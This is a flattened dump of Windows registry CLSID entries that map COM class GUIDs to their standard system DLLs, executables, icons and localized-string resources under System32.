HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{136BFD13-0C9E-49B3-8C4E-74A235AFEA37}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{139D8403-E74F-41d2-B103-8790C5C7A517}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13a4bbe8-6527-40cb-a996-1602829541ef}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13EE36D8-2EFD-44F6-AF3B-75FF35E6C691}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14010e02-bbbd-41f0-88e3-eda371216584}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14074e0b-7216-4862-96e6-53cada442a56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14074e0b-7216-4862-96e6-53cada442a56}\Instance\InitPropertyBag DefaultIcon REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14795a8f-78f3-47bd-acb6-e767414fe293}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{147A9C5D-36F4-4e3e-BD47-F5F207425085}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{148BD520-A2AB-11CE-B11F-00AA00530503}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\System32\mstask.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{148BD520-A2AB-11CE-B11F-00AA00530503}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\mstask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\System32\mstask.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\mstask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14ce31dc-abc2-484c-b061-cf3416aed8ff}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shutdownux.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14DD9A1C-7CFF-41be-B1B9-BA1AC6ECB571}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{14E74C62-DC97-43B0-8F2F-581496A65D60}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{150F28F1-49A5-4C28-BE1A-CFA854A1D04B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\tpmvsc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC}\LocalServer32 (Default) REG_EXPAND_SZ "%SystemRoot%\System32\RmtTpmVscMgrSvr.exe" ServerExecutable REG_EXPAND_SZ %SystemRoot%\System32\RmtTpmVscMgrSvr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1531d583-8375-4d3f-b5fb-d23bbd169f22}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1535D95C-2365-447D-9800-B75501A19C0C}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15756be1-a4ad-449c-b576-df3df0e068d3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{157D9A5F-5139-4AD7-AC07-6E8B996FE99F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15A58581-C545-46FE-BD72-FC6416CD2AF7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LegacyNetUX.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15b0bb4c-0f7d-11D1-b21f-00C04Fb9473f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15deef81-c4c4-431f-b0c9-b62cb9ea3aa9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnapps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15E16AEC-F2F0-4E52-B0DF-029D11E58E4B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15eae92e-f17a-4431-9f28-805e482dafd4} InfoTip REG_EXPAND_SZ @%systemroot%\system32\appwiz.cpl,-155 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-156 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15eae92e-f17a-4431-9f28-805e482dafd4}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-87 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15eae92e-f17a-4431-9f28-805e482dafd4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{15fc1bac-8d83-4e87-8cc2-a70c9f66f943}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{163FDC20-2ABC-11d0-88F0-00A024AB2DBB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1649d1cf-deaf-4a68-abe8-5c9f68572fd1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{16671E5F-0CE6-4CC4-9768-E89FE5018ADE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{167c0a56-c490-4623-9225-8ffdc546e56c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1685D4AB-A51B-4af1-A4E5-CEE87002431D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{168F4281-EC0D-46D3-951D-FBCB2F7C9079}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fhsrchapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1698790a-e2b4-11d0-b0b1-00c04fd8dca6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsuiext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{169A0691-8DF9-11d1-A1C4-00C04FD75D13}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\TpmVscMgrSvr.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A}\LocalServer32 (Default) REG_EXPAND_SZ "%SystemRoot%\System32\TpmVscMgrSvr.exe" ServerExecutable REG_EXPAND_SZ %SystemRoot%\System32\TpmVscMgrSvr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{16CA098E-5156-4EDC-B064-741AB2B08A38}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{16D5A2BE-B1C5-47b3-8EAE-CCBCF452C7E8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\webcamui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17383A17-6B93-4193-9B60-4D4F99C05163}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{173FD26E-B0F7-42BF-BFD0-D91DF64CC298}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\tpmvsc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1765E14E-1BD4-462E-B6B1-590BF1262AC6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1767B93A-B021-44EA-920F-863C11F4F768}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{178167bc-4ee3-403e-8430-a6434162db17}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\webplatstorageserver.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{179CC917-3A82-40E7-9F8C-2FC8A3D2212B} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\sppcomapi.dll,-3200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{179CC917-3A82-40E7-9F8C-2FC8A3D2212B}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\sppcomapi.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{179CC917-3A82-40E7-9F8C-2FC8A3D2212B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppcomapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17B21A1B-6C59-48E0-A448-6BC9AD2C5BFE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17B75166-928F-417d-9685-64AA135565C1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PhotoMetadataHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17C82257-654E-4C47-8E23-DCA24EAA76A0}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sysmain.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\EditionUpgradeManagerObj.dll,-3100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\EditionUpgradeManagerObj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17cd9488-1228-4b2f-88ce-4298e93e0966} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\sud.dll,-10#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\sud.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17cd9488-1228-4b2f-88ce-4298e93e0966}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-24 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17cd9488-1228-4b2f-88ce-4298e93e0966}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17cd9488-1228-4b2f-88ce-4298e93e0966}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\sud.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{17f418ed-5cd0-4067-be51-4c96d386ebc1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{181b54fc-380b-4a75-b3f1-4ac45e9605b0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{182C40F0-32E4-11D0-818B-00A0C9231C29}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{184132B8-32F8-4784-9131-DD7224B23438}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1860E246-E924-4F73-B2C5-93E0577E3AA1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{18619969-3835-41E5-B457-44FE0DB77653}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxStreamingDataSourcePS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{186cda7f-de22-4b95-99b7-49efba0a08f4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{188890A9-EFC6-4B11-8E76-D8579F739E86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{18907f3b-9afb-4f87-b764-f9a4e16a21b8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{189255E0-6EF0-41C5-8A1E-3B391D691215}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{18FBD4BC-16EA-47f2-8AD0-868C1269C79A} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\easinvoker.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1910E202-236A-43E6-9469-FE0B3149F3D9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WwanRadioManager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19129EAC-A717-4BBD-87E0-615E3C939668}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19198abd-d4b9-4e14-b156-725f85205f0f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19204EDD-187C-40B7-ADA4-79772BD10FB2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Windows.Devices.SmartCards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19227DC0-FC88-4AAA-8C2D-A0DB913AA2FF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19352205-42B0-4690-9AA4-D7DB9AE5F259}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{193B4137-0480-11D1-97DA-00C04FB9618A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcprx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195C8ACD-5F96-4C67-BBCF-B0CD7073500C}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1968106d-f3b5-44cf-890e-116fcb9ecef1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sud.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{196f128d-dce9-4090-b061-3d29c6ca32c2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19833350-BF9B-42A1-BDF0-BD1FCBE1FD31} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\ImmersiveTpmVscMgrSvr.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19833350-BF9B-42A1-BDF0-BD1FCBE1FD31}\LocalServer32 (Default) REG_EXPAND_SZ "%SystemRoot%\System32\ImmersiveTpmVscMgrSvr.exe" ServerExecutable REG_EXPAND_SZ %SystemRoot%\System32\ImmersiveTpmVscMgrSvr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19A76FE0-7494-11D0-8816-00A0C903B83C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19AD99AE-0DD2-495A-AAC4-015E479722FD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\VscMgrPS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19b9dcc7-6f37-4dc7-9da6-8af601c5fce2}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WWanMM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19BA17F2-2602-4E77-9027-103894607626} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\sharemediacpl.dll,-4 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19BA17F2-2602-4E77-9027-103894607626}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\wmploc.dll,-2957 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19BA17F2-2602-4E77-9027-103894607626}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sharemediacpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19C65143-6230-42FA-A58E-7D9FA9BE2EB5}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wkspbroker.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{19eb3aee-148e-42fe-a569-a7dc9b25d658}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A0391BF-9564-4294-B0A4-06C298929EF9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1a184871-359e-4f67-aad9-5b9905d62232}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A1F4206-0688-4E7F-BE03-D82EC69DF9A5}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A34F5C1-4A5A-46DC-B644-1F4567E7A676}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A3F11DC-B514-4B17-8C5F-2154513852F1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A68CF90-753A-4523-A4A4-40CAB4BC6EFF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ms3dthumbnailprovider.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1ab4a8c0-6a0b-11d2-ad49-00c04fa31a86}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsuiext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1AB78400-B5A3-4D91-8ACE-33FCD1499BE6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1AC32B1A-E379-4CAD-B655-F978A30856EC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SmartCardSimulator.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1AD699A6-31F7-4EF0-93E9-FFD576F35D30}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1ADD3454-9CD8-449B-8777-341DAC8A3B0A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1AF81E4E-FC45-48ee-B236-A2A663494390}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B02C1F5-555B-4802-96A7-ADDDCCBCA38A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Dot3MM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1A897E-FBEE-41CF-8C48-9BF764F62B8B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\softkbd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1b283861-754f-4022-ad47-a5eaaa618894}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SmartcardCredentialProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B2AFB92-0B5E-4A30-B5CC-353DB4F9E150}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B57B2A1-E763-4676-9064-297F1B413632}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B6FC61A-648A-4493-A303-A1A22B543F01}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1b9f2bf2-27f5-4dec-a175-3cf7bb8cfd3e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1BA783C1-2A30-4ad3-B928-A9A46C604C28} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-13056 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1BA783C1-2A30-4ad3-B928-A9A46C604C28}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1BC972D6-555C-4FF7-BE2C-C584021A0A6A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1BCD547A-62F6-4F2D-A0E3-B4930A3F3C33}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\EventTracingManagement.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1bef2128-2f96-4500-ba7c-098dc0049cb2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1C0F439D-7C29-4bde-8952-4EEB6A49E048}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1C16EBAB-7C12-4F21-A2A9-56D67931108F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\HttpsDataSource.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1c1800c1-3258-44c2-be80-3deadb6c5e39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1c391f2b-801a-416c-9838-6be810293dfc}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1c5346b8-63e1-4c2b-b125-3c5db94e946c}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IME\IMETC\applets\imtcskf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1C749B87-568C-4865-8E73-6413F8372CE6} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\lpksetup.exe,-2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1C749B87-568C-4865-8E73-6413F8372CE6}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\lpksetup.exe,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1C749B87-568C-4865-8E73-6413F8372CE6}\LocalServer32 (Default) REG_EXPAND_SZ "%systemroot%\system32\lpksetup.exe" ServerExecutable REG_EXPAND_SZ %systemroot%\system32\lpksetup.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CC6B704-D0F5-4dc3-A521-13620D89E8BC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1cc78354-9ded-4c1b-bd81-c67b0289a4e5}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CD0938D-1AC1-49DE-AA04-F2C92D4A02D1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FirewallControlPanel.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CE75EE1-E27E-4D22-804F-C76D53192D55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1cedc5da-3614-11d2-bf96-00c04fd8d5b0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CF1260C-4DD0-4ebb-811F-33C572699FDE} Infotip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-12689 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CFC4CDA-1271-11D1-9BD4-00C04FB683FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1d16438c-54dc-404f-83a9-c041e77a32dd}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcuiu.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1d27f844-3a1f-4410-85ac-14651078412d}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\acppage.dll 